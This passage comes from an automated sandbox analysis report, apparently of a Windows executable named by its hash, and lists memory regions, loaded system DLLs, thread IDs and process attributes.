monitored = 0
entry_point = 0x7ffc5afda960
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 1394
start_va = 0x7ffc5b120000
end_va = 0x7ffc5b168fff
monitored = 0
entry_point = 0x7ffc5b12a090
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 1395
start_va = 0x7ffc5b240000
end_va = 0x7ffc5b24bfff
monitored = 0
entry_point = 0x7ffc5b2427e0
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 1396
start_va = 0x7ffc5b320000
end_va = 0x7ffc5b350fff
monitored = 0
entry_point = 0x7ffc5b327d10
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1397
start_va = 0x7ffc5b380000
end_va = 0x7ffc5b3f9fff
monitored = 0
entry_point = 0x7ffc5b3a1a50
region_type = mapped_file
name = "schannel.dll"
filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")
Region:
id = 1398
start_va = 0x7ffc5b440000
end_va = 0x7ffc5b473fff
monitored = 0
entry_point = 0x7ffc5b45ae70
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1399
start_va = 0x7ffc5b480000
end_va = 0x7ffc5b489fff
monitored = 0
entry_point = 0x7ffc5b481830
region_type = mapped_file
name = "dpapi.dll"
filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll")
Region:
id = 1400
start_va = 0x7ffc5b590000
end_va = 0x7ffc5b5aefff
monitored = 0
entry_point = 0x7ffc5b595d30
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1401
start_va = 0x7ffc5b700000
end_va = 0x7ffc5b75bfff
monitored = 0
entry_point = 0x7ffc5b716f70
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1402
start_va = 0x7ffc5b7b0000
end_va = 0x7ffc5b7c6fff
monitored = 0
entry_point = 0x7ffc5b7b79d0
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1403
start_va = 0x7ffc5b8d0000
end_va = 0x7ffc5b8dafff
monitored = 0
entry_point = 0x7ffc5b8d19a0
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1404
start_va = 0x7ffc5b910000
end_va = 0x7ffc5b930fff
monitored = 0
entry_point = 0x7ffc5b920250
region_type = mapped_file
name = "joinutil.dll"
filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll")
Region:
id = 1405
start_va = 0x7ffc5b960000
end_va = 0x7ffc5b999fff
monitored = 0
entry_point = 0x7ffc5b968d20
region_type = mapped_file
name = "ntasn1.dll"
filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll")
Region:
id = 1406
start_va = 0x7ffc5b9a0000
end_va = 0x7ffc5b9c6fff
monitored = 0
entry_point = 0x7ffc5b9b0aa0
region_type = mapped_file
name = "ncrypt.dll"
filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")
Region:
id = 1407
start_va = 0x7ffc5bab0000
end_va = 0x7ffc5badcfff
monitored = 0
entry_point = 0x7ffc5bac9d40
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1408
start_va = 0x7ffc5bc40000
end_va = 0x7ffc5bc95fff
monitored = 0
entry_point = 0x7ffc5bc50bf0
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 1409
start_va = 0x7ffc5bca0000
end_va = 0x7ffc5bcb8fff
monitored = 0
entry_point = 0x7ffc5bca5e10
region_type = mapped_file
name = "eventaggregation.dll"
filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll")
Region:
id = 1410
start_va = 0x7ffc5bcc0000
end_va = 0x7ffc5bce8fff
monitored = 0
entry_point = 0x7ffc5bcd4530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1411
start_va = 0x7ffc5bcf0000
end_va = 0x7ffc5bd88fff
monitored = 0
entry_point = 0x7ffc5bd1f4e0
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 1412
start_va = 0x7ffc5be30000
end_va = 0x7ffc5be43fff
monitored = 0
entry_point = 0x7ffc5be352e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1413
start_va = 0x7ffc5be50000
end_va = 0x7ffc5be5efff
monitored = 0
entry_point = 0x7ffc5be53210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 1414
start_va = 0x7ffc5be60000
end_va = 0x7ffc5be6ffff
monitored = 0
entry_point = 0x7ffc5be656e0
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1415
start_va = 0x7ffc5be70000
end_va = 0x7ffc5bebafff
monitored = 0
entry_point = 0x7ffc5be735f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 1416
start_va = 0x7ffc5bec0000
end_va = 0x7ffc5bf02fff
monitored = 0
entry_point = 0x7ffc5bed4b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1417
start_va = 0x7ffc5bf10000
end_va = 0x7ffc5bf95fff
monitored = 0
entry_point = 0x7ffc5bf1d8f0
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 1418
start_va = 0x7ffc5bfa0000
end_va = 0x7ffc5c187fff
monitored = 0
entry_point = 0x7ffc5bfcba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1419
start_va = 0x7ffc5c190000
end_va = 0x7ffc5c356fff
monitored = 0
entry_point = 0x7ffc5c1edb80
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1420
start_va = 0x7ffc5c360000
end_va = 0x7ffc5c3b4fff
monitored = 0
entry_point = 0x7ffc5c377970
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 1421
start_va = 0x7ffc5c3c0000
end_va = 0x7ffc5ca03fff
monitored = 0
entry_point = 0x7ffc5c5864b0
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 1422
start_va = 0x7ffc5cac0000
end_va = 0x7ffc5cb29fff
monitored = 0
entry_point = 0x7ffc5caf6d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 1423
start_va = 0x7ffc5cb30000
end_va = 0x7ffc5cb46fff
monitored = 0
entry_point = 0x7ffc5cb31390
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 1424
start_va = 0x7ffc5cb50000
end_va = 0x7ffc5cc04fff
monitored = 0
entry_point = 0x7ffc5cb922e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 1425
start_va = 0x7ffc5cc10000
end_va = 0x7ffc5cc6bfff
monitored = 0
entry_point = 0x7ffc5cc2b720
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 1426
start_va = 0x7ffc5cc80000
end_va = 0x7ffc5e1defff
monitored = 0
entry_point = 0x7ffc5cde11f0
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1427
start_va = 0x7ffc5e1e0000
end_va = 0x7ffc5e2a0fff
monitored = 0
entry_point = 0x7ffc5e200da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1428
start_va = 0x7ffc5e2b0000
end_va = 0x7ffc5e3cbfff
monitored = 0
entry_point = 0x7ffc5e2f02b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1429
start_va = 0x7ffc5e3e0000
end_va = 0x7ffc5e522fff
monitored = 0
entry_point = 0x7ffc5e408210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1430
start_va = 0x7ffc5e740000
end_va = 0x7ffc5e7aafff
monitored = 0
entry_point = 0x7ffc5e7590c0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1431
start_va = 0x7ffc5e7b0000
end_va = 0x7ffc5e801fff
monitored = 0
entry_point = 0x7ffc5e7bf530
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1432
start_va = 0x7ffc5e850000
end_va = 0x7ffc5e8ecfff
monitored = 0
entry_point = 0x7ffc5e8578a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1433
start_va = 0x7ffc5e8f0000
end_va = 0x7ffc5e94afff
monitored = 0
entry_point = 0x7ffc5e9038b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1434
start_va = 0x7ffc5e950000
end_va = 0x7ffc5e957fff
monitored = 0
entry_point = 0x7ffc5e951ea0
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1435
start_va = 0x7ffc5e960000
end_va = 0x7ffc5eab5fff
monitored = 0
entry_point = 0x7ffc5e96a8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1436
start_va = 0x7ffc5ec20000
end_va = 0x7ffc5ecc6fff
monitored = 0
entry_point = 0x7ffc5ec358d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1437
start_va = 0x7ffc5ecd0000
end_va = 0x7ffc5ed7cfff
monitored = 0
entry_point = 0x7ffc5ece81a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1438
start_va = 0x7ffc5ee90000
end_va = 0x7ffc5f2b8fff
monitored = 0
entry_point = 0x7ffc5eeb8740
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 1439
start_va = 0x7ffc5f2c0000
end_va = 0x7ffc5f53cfff
monitored = 0
entry_point = 0x7ffc5f394970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 1440
start_va = 0x7ffc5f540000
end_va = 0x7ffc5f6c5fff
monitored = 0
entry_point = 0x7ffc5f58ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1441
start_va = 0x7ffc5f760000
end_va = 0x7ffc5f806fff
monitored = 0
entry_point = 0x7ffc5f76b4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1442
start_va = 0x7ffc5f810000
end_va = 0x7ffc5f9d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1547
start_va = 0x560000
end_va = 0x560fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000560000"
filename = ""
Region:
id = 1890
start_va = 0x6f00000
end_va = 0x6ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006f00000"
filename = ""
Region:
id = 1891
start_va = 0x7100000
end_va = 0x71fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007100000"
filename = ""
Region:
id = 1892
start_va = 0x7400000
end_va = 0x74fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007400000"
filename = ""
Region:
id = 1894
start_va = 0x3200000
end_va = 0x327ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003200000"
filename = ""
Region:
id = 1895
start_va = 0x3280000
end_va = 0x32fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003280000"
filename = ""
Region:
id = 1896
start_va = 0x4080000
end_va = 0x417ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004080000"
filename = ""
Region:
id = 1897
start_va = 0x7ffc59400000
end_va = 0x7ffc59450fff
monitored = 0
entry_point = 0x7ffc594025e0
region_type = mapped_file
name = "cscobj.dll"
filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll")
Region:
id = 1898
start_va = 0x4380000
end_va = 0x447ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004380000"
filename = ""
Thread:
id = 19
os_tid = 0xc98
Thread:
id = 20
os_tid = 0xe08
Thread:
id = 21
os_tid = 0x9f0
Thread:
id = 22
os_tid = 0x680
Thread:
id = 23
os_tid = 0x1308
Thread:
id = 24
os_tid = 0x12f8
Thread:
id = 25
os_tid = 0x12dc
Thread:
id = 26
os_tid = 0x1270
Thread:
id = 27
os_tid = 0x1200
Thread:
id = 28
os_tid = 0x7cc
Thread:
id = 29
os_tid = 0x7e0
Thread:
id = 30
os_tid = 0x3c0
Thread:
id = 31
os_tid = 0xe90
Thread:
id = 32
os_tid = 0x424
Thread:
id = 33
os_tid = 0x3d4
Thread:
id = 34
os_tid = 0x41c
Thread:
id = 35
os_tid = 0xe4c
Thread:
id = 36
os_tid = 0xc48
Thread:
id = 37
os_tid = 0xe44
Thread:
id = 38
os_tid = 0xba4
Thread:
id = 39
os_tid = 0xe3c
Thread:
id = 40
os_tid = 0x514
Thread:
id = 41
os_tid = 0x45c
Thread:
id = 42
os_tid = 0x3b4
Thread:
id = 43
os_tid = 0x388
Thread:
id = 44
os_tid = 0x334
Thread:
id = 45
os_tid = 0x27c
Thread:
id = 46
os_tid = 0xdb0
Thread:
id = 47
os_tid = 0xa34
Thread:
id = 48
os_tid = 0xdd8
Thread:
id = 49
os_tid = 0xa44
Thread:
id = 50
os_tid = 0xcfc
Thread:
id = 51
os_tid = 0xf30
Thread:
id = 52
os_tid = 0x364
Thread:
id = 53
os_tid = 0x300
Thread:
id = 54
os_tid = 0xc28
Thread:
id = 55
os_tid = 0x904
Thread:
id = 56
os_tid = 0xc18
Thread:
id = 57
os_tid = 0xc34
Thread:
id = 58
os_tid = 0x5bc
Thread:
id = 59
os_tid = 0x5f4
Thread:
id = 60
os_tid = 0x938
Thread:
id = 61
os_tid = 0xc0c
Thread:
id = 62
os_tid = 0xc14
Thread:
id = 63
os_tid = 0xffc
Thread:
id = 64
os_tid = 0xfcc
Thread:
id = 65
os_tid = 0xf9c
Thread:
id = 66
os_tid = 0xf6c
Thread:
id = 67
os_tid = 0xc64
Thread:
id = 68
os_tid = 0xb4c
Thread:
id = 69
os_tid = 0x9fc
Thread:
id = 70
os_tid = 0x9d8
Thread:
id = 71
os_tid = 0x9b4
Thread:
id = 72
os_tid = 0x9ac
Thread:
id = 73
os_tid = 0x9a4
Thread:
id = 74
os_tid = 0x950
Thread:
id = 75
os_tid = 0x94c
Thread:
id = 76
os_tid = 0x948
Thread:
id = 77
os_tid = 0x8f8
Thread:
id = 78
os_tid = 0x8c4
Thread:
id = 79
os_tid = 0x8b0
Thread:
id = 80
os_tid = 0x894
Thread:
id = 81
os_tid = 0x888
Thread:
id = 82
os_tid = 0x86c
Thread:
id = 83
os_tid = 0x840
Thread:
id = 84
os_tid = 0x4f4
Thread:
id = 85
os_tid = 0x464
Thread:
id = 86
os_tid = 0x4d0
Thread:
id = 87
os_tid = 0x420
Thread:
id = 88
os_tid = 0x7c0
Thread:
id = 89
os_tid = 0x608
Thread:
id = 90
os_tid = 0x4f8
Thread:
id = 91
os_tid = 0x49c
Thread:
id = 92
os_tid = 0x2ac
Thread:
id = 93
os_tid = 0x1b4
Thread:
id = 94
os_tid = 0x1b8
Thread:
id = 95
os_tid = 0x1cc
Thread:
id = 96
os_tid = 0x16c
Thread:
id = 97
os_tid = 0x190
Thread:
id = 98
os_tid = 0x3fc
Thread:
id = 99
os_tid = 0x3f4
Thread:
id = 100
os_tid = 0x3e8
Thread:
id = 101
os_tid = 0x3e4
Thread:
id = 102
os_tid = 0x3d0
Thread:
id = 103
os_tid = 0x3cc
Thread:
id = 104
os_tid = 0x348
Thread:
id = 142
os_tid = 0x928
Thread:
id = 143
os_tid = 0x87c
Thread:
id = 144
os_tid = 0x17c
Thread:
id = 145
os_tid = 0xa6c
Thread:
id = 146
os_tid = 0x8fc
Thread:
id = 147
os_tid = 0x308
Thread:
id = 148
os_tid = 0x4cc
Process:
id = "5"
image_name = "8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
filename = "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
page_root = "0x20870000"
os_pid = "0x9a8"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0xaf0"
cmd_line = "\"{path}\""
cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1444
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1445
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1446
start_va = 0x40000
end_va = 0x54fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1447
start_va = 0x60000
end_va = 0x9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 1448
start_va = 0xa0000
end_va = 0x19ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 1449
start_va = 0x1a0000
end_va = 0x1a3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 1450
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001b0000"
filename = ""
Region:
id = 1451
start_va = 0x1c0000
end_va = 0x1c1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1452
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1453
start_va = 0x400000
end_va = 0x587fff
monitored = 1
entry_point = 0x583f8e
region_type = mapped_file
name = "8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe")
Region:
id = 1454
start_va = 0x77260000
end_va = 0x773dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 1455
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 1456
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1457
start_va = 0x7fff0000
end_va = 0x7ffc5f80ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 1458
start_va = 0x7ffc5f810000
end_va = 0x7ffc5f9d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1459
start_va = 0x7ffc5f9d1000
end_va = 0x7ffffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00007ffc5f9d1000"
filename = ""
Region:
id = 1460
start_va = 0x400000
end_va = 0x437fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 1461
start_va = 0x480000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 1462
start_va = 0x62ee0000
end_va = 0x62f2ffff
monitored = 0
entry_point = 0x62ef8180
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 1463
start_va = 0x62f30000
end_va = 0x62fa9fff
monitored = 0
entry_point = 0x62f43290
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 1464
start_va = 0x74530000
end_va = 0x7460ffff
monitored = 0
entry_point = 0x74543980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1465
start_va = 0x62fb0000
end_va = 0x62fb7fff
monitored = 0
entry_point = 0x62fb17c0
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 1466
start_va = 0x490000
end_va = 0x6cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 1467
start_va = 0x6cd30000
end_va = 0x6cd88fff
monitored = 1
entry_point = 0x6cd40780
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll")
Region:
id = 1468
start_va = 0x74530000
end_va = 0x7460ffff
monitored = 0
entry_point = 0x74543980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1469
start_va = 0x76c20000
end_va = 0x76d9dfff
monitored = 0
entry_point = 0x76cd1b90
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 1470
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1471
start_va = 0x7feb0000
end_va = 0x7ffaffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007feb0000"
filename = ""
Region:
id = 1472
start_va = 0x490000
end_va = 0x54dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1473
start_va = 0x5d0000
end_va = 0x6cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005d0000"
filename = ""
Region:
id = 1474
start_va = 0x6d0000
end_va = 0x82ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006d0000"
filename = ""
Region:
id = 1475
start_va = 0x20000
end_va = 0x23fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 1476
start_va = 0x76a90000
end_va = 0x76b0afff
monitored = 0
entry_point = 0x76aae970
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 1477
start_va = 0x74290000
end_va = 0x7434dfff
monitored = 0
entry_point = 0x742c5630
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 1478
start_va = 0x440000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000440000"
filename = ""
Region:
id = 1479
start_va = 0x6d0000
end_va = 0x7cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006d0000"
filename = ""
Region:
id = 1480
start_va = 0x820000
end_va = 0x82ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000820000"
filename = ""
Region:
id = 1481
start_va = 0x74a40000
end_va = 0x74a83fff
monitored = 0
entry_point = 0x74a59d80
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 1482
start_va = 0x75f60000
end_va = 0x7600cfff
monitored = 0
entry_point = 0x75f74f00
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 1483
start_va = 0x73f90000
end_va = 0x73fadfff
monitored = 0
entry_point = 0x73f9b640
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 1484
start_va = 0x73f80000
end_va = 0x73f89fff
monitored = 0
entry_point = 0x73f82a00
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 1485
start_va = 0x75ef0000
end_va = 0x75f47fff
monitored = 0
entry_point = 0x75f325c0
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")
Region:
id = 1486
start_va = 0x830000
end_va = 0x9cffff
monitored = 1
entry_point = 0x0
region_type = private
